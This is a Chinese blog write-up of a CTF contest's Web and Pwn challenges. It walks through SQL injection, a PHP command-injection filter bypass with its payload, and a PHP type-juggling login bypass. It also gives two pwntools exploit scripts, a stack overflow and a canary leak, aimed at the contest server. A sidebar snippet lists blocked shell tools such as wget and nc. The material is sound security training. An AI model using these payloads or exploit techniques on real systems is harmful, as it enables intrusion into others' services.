首届“钓鱼城”杯网络安全技能大赛Web&PWN

已于 2023-05-06 00:55:32 修改
阅读量377 收藏
点赞数
文章标签: web安全 安全
于 2023-05-05 22:23:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61155226/article/details/130516098
版权

WEB

简单的注入

先使用Dirsearch扫描,发现存在Robots.txt文件,进行访问,得到如下提示:

不难发现存在一个登录页面和一个存在明显注入点的页面;

我们可以使用SQLMap跑出对应数据库中的登录信息,然后登录即可获得Flag

Ping

        这是一道简单的RCE的题目;照例先查看一下当前目录下的文件;

127.0.0.1 | ls

        执行后发现存在flag文件,我们尝试直接查看,但是不行;通过抓包分析得知进行了过滤

代码如下:

<?php
highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['ip'])){
    $ip = $_GET['ip'];
    if(!preg_match("/;|flag|@|\*|\?|'|\"/i",$ip)){
        system('ping -c 4 '.$ip);
    }
    else{
        echo "<script>alert('bad argument')</script>";
    }
}

                我们可以通过?ip=127.0.0.1|cat%20fla%1g进行绕过,或者使用Base64编码绕过;即可获得Flag

Hasai 

PHP的强类型比较,我们可以使用数值绕过:

PHP中的弱类型比较和强类型比较可以参考:

(42条消息) ctfshow-php特性-超详解(干货)_ctfshowphp特性_Yn8rt的博客-CSDN博客

(45条消息) WEB攻防-PHP特性&缺陷对比函数&CTF考点_intval绕过_@墨竹的博客-CSDN博客

<?php
highlight_file(__FILE__);
error_reporting(0);
include "flag.php";
if (!isset($_POST['username']) && !isset($_POST['password'])){exit(0);}
$username = $_POST['username'];
for ($i = 0;$i < count($username); $i++){
    if ($username[$i] === 'admin'){
        echo "error";
        exit(0);
    }
    $username[$i] = intval($username[$i]);
}
if (array_search("admin",$username) === 0){
    if(strcmp($_POST['password'],$password) == 0 ){
        echo "<br>Right! login success! </br>";
        echo $flag;
    }else{
        echo "<br>wrong password<br>";
    }
}

Pwn

easy_pwn

使用IDApro(32位)打开文件并查看Main函数伪代码

main()函数中存在关键函数message()的调用,然后查看message()函数的伪代码

发现存在无限字节的栈溢出,接下来通过覆盖char s [28]和 rbp再添加shellcode_addr即可getshell,发现程序中存在flag()后门函数地址为0x08048519

Exp:

from pwn import *
r = remote('101.42.165.118',20001)
shellcode_addr = 0x08048519
payload = b'X' * 32 + p32(shellcode_addr)
r.sendline(payload)
r.interactive()

ez_canary

使用IDApro(64位)打开文件并查看Main函数伪代码

main()函数中存在关键函数vuln()的调用,然后我们查看vuln()函数的伪代码

        要先泄露Canary然后再构造Payload,发现char v4[10] 此时我们只需要利用read()函数填充v4为11即可泄露Canary,然后我们我们再通过下一个read()函数发送payload = padding + cannary + padding + shell_addr 即可getshell

Exp:

from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'
io = remote('101.42.165.118', 20002)

payload = b'a' * 11
io.send(payload)
io.recvuntil('a' * 11)
canary = u64('\x00' + io.recv(7))
log.success('Canary:\t' + hex(canary))

payload2 = b'a' * 20 + p64(canary) + b'a' * 8 + p64(0x000000000040121E)
io.send(payload2)

io.interactive()


#DASCTF{9c565f3584a8e7ad64a73996b615811b}

SlackMoon
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2023年网络安全比赛--Web渗透测试国赛篇(超详细)
Aluxian_的博客
06-29 2463
2023网络安全解析 国赛篇2380
CTFshow php特性
m0_57114395的博客
04-29 557
web135 <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-16 18:48:03 */ error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']){ ...
移动/复制 VMware虚拟机后网络出现错误
m0_61155226的博客
03-17 274
VMware网络异常解决方式
攻防世界-favorite_number
m0_47571887的博客
11-19 2821
打开题目,看到一些php的代码,我们来审计一下 第一个if ($stuff===$array&&$stuff[0]!='admin') //强等于,并且首元素不等于admin (preg_match("/^\d+$/im",$num) //必须是纯数字,并且前面的/是开启了多行匹配,加上^和$,匹配开头和结尾,合起来就是匹配每行的开头和结尾 (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*...
[ctf.show]命令执行29-54
Huamang的博客
03-01 2389
web 29 代码审计 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 涉及到一个函数preg_match(): 这个preg_match 函数用于执行一个正则表达式匹配。 看这次的判断是不能出现flag字样,后面的i意思
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛
07-16
Pwn】fuzzerinstrospector 是首届数字空间安全攻防大赛中的一项挑战,这个比赛旨在测试参赛者在信息安全领域的技能,特别是针对软件漏洞的发现和利用能力。在这个特定的挑战中,参赛者可能需要使用模糊测试...
2020年第六届“湖湘网络安全技能大赛洞庭决赛-互联网选拔赛-第二场-线上CTF赛.zip
11-01
【标题】: 2020年第六届“湖湘网络安全技能大赛洞庭决赛-互联网选拔赛-第二场-线上CTF赛 【描述】: 这个压缩包文件包含了2020年第六届“湖湘网络安全技能大赛洞庭决赛中,互联网选拔赛第二场的线上CTF...
全国网络与信息安全管理职业技能大赛2020年题库
09-30
以上知识点涵盖了网络与信息安全管理大赛可能涉及的重要内容,包括网络协议、标准化、网络体系结构、网络安全法规、内容安全、营业场所安全,以及计算机网络的基本概念和通信技术。这些知识对于理解和处理网络安全...
【天格】战队-未解出题目附件-第六届“强网”全国网络安全挑战赛
08-01
【天格】战队在第六届“强网”全国网络安全挑战赛中分享了多个未解出的题目附件,这些附件涵盖了网络安全领域的多个子领域,包括逆向工程、漏洞利用(PWN)、密码学(Crypto)以及杂项(Misc)。通过分析这些文件...
【广东大学生网络攻防大赛Pwn | jmp_rsp 题目附件
05-24
网络安全领域,特别是针对Pwn(破解)类竞赛,"jmp_rsp"是一个常见的技术概念,主要涉及栈溢出漏洞的利用。广东大学生网络攻防大赛中的这个“jmp_rsp”题目显然是设计来测试参赛者对这类漏洞的理解和利用能力。...
全国职业院校技能大赛网络安全web;mysql安全之综合渗透测试
虚心学习,脚踏实地
06-04 1602
web安全之综合渗透测试
网络安全经典赛题-Web安全之综合渗透测试
最新发布
weixin_59005129的博客
04-12 1345
11.使用渗透机场景windows7访问http://靶机IP/11,对该页面进行渗透测试,通过提示得到Flag并提交;12.使用渗透机场景windows7访问http://靶机IP/12,对该页面进行渗透测试,通过提示得到Flag并提交;10.使用渗透机场景windows7访问http://靶机IP/10,对该页面进行渗透测试,通过提示得到Flag并提交;13.使用渗透机场景windows7访问http://靶机IP/13,对该页面进行渗透测试,通过提示得到Flag并提交;
命令执行绕过技巧
菜鸟-传奇
01-21 2039
命令执行绕过技巧 参考:https://blog.csdn.net/weixin_39190897/article/details/116247765 参考:https://blog.csdn.net/solitudi/article/details/109837640 正则过滤 参考:https://www.runoob.com/php/php-preg_match.html 参考:https...
CTF 总结02:preg_match()绕过
热门推荐
weixin_42789937的博客
01-18 1万+
preg_match()绕过,小白总结,修改过一次,后期会根据做题经历有所增补~
[DVWA靶场搭建]使用Docker搭建DVWA靶场
m0_61155226的博客
03-31 2191
通过Docker安装DVWA靶场;DVWA靶场安装,
CTFSHOW WEB入门 命令执行 web29-48
sinat_41572027的博客
07-09 1809
CTFSHOW WEB入门 命令执行 web29-48
ctfshow web入门 远程命令执行
qq_39948058的博客
10-04 994
前言:做一下ctfshow web入门远程命令执行题,这里记录下,刚小白也是刚学web方向的题,大佬勿喷。。。 web29 具体分析在代码里: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04...
首届钓鱼逆向题REG题解
z4ky的博客
08-28 841
首届钓鱼逆向题REG题解 首先下载程序,观察, 通过这个图标可以看出,感觉这个程序并不是普通的C/C++写的EXE程序,而是其他语言打包的 用IDA打开程序,果然,毫无头绪 用010editor打开程序,发现里面找到了关键字符串,然后居然是在资源段 用ResourceHacker打开reg.exe 发现,关键数据是在PRELOAD.MAIN里面,并且可以发现这个程序是用aardio写的,本来想反编译PRELOAD.MAIN来还原源代码来着,结果并没有找到相关aardio反编译的资料 (如果大佬知道
[MySQL]教学管理系统
m0_61155226的博客
03-17 3078
[MySQL]员工工资管理系统
2021强网Writeup--by Nu1L Team.pdf
06-15
"2021强网Writeup--by Nu1L Team.pdf" 是一份...这份Writeup详尽地介绍了"强网"比赛中遇到的各种网络安全技术挑战,包括Web安全攻防、逆向工程、加密算法破解等多个层面,是学习网络安全知识和技术的一个宝贵资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值